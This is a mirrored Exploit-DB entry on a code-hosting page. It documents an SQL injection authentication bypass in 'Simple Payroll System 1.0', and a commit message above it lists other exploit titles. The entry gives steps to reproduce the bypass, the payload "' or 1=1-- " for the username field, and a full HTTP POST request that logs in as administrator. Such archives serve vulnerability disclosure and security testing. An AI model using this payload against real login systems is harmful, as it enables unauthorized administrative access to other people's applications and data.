bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50403.txt
Offensive Security 679a62755b DB: 2021-10-14 
28 changes to exploits/shellcodes

Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)
Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection

Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution
Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)

Simple Payroll System 1.0 - SQLi Authentication Bypass

Dolibarr ERP/CRM 14.0.1 - Privilege Escalation

Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)

Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Budget and Expense Tracker System 1.0 - Arbitrary File Upload
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation
Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)
Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass
Simple Issue Tracker System 1.0 - SQLi Authentication Bypass
Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)
Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)
Sonicwall SonicOS 7.0 - Host Header Injection

Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
2021-10-14 05:02:11 +00:00

35 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Simple Payroll System 1.0 - SQLi Authentication Bypass
# Date: 2021-10-09
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://www.sourcecodester.com/php/14974/simple-payroll-system-dynamic-tax-bracket-php-using-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple_payroll_0.zip
# Version: 1.0
# Tested on: Windows 10
# Description: Simple Payroll System v1.0 Login page can be bypassed with a SQLi into the username parameter.
Steps To Reproduce:
1 - Navigate to http://localhost/simple_payroll/admin/login.php
2 - Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
3 - Click on "Login" button and you are logged in as administrator.
Proof Of Concept:
POST /simple_payroll/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 37
Origin: http://localhost
Connection: close
Referer: http://localhost/simple_payroll/admin/login.php
Cookie: PHPSESSID=ijad04l4pfb2oec6u2vmi4ll9p
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
username='+or+1%3D1--+&password=admin
Reference in a new issue View git blame Copy permalink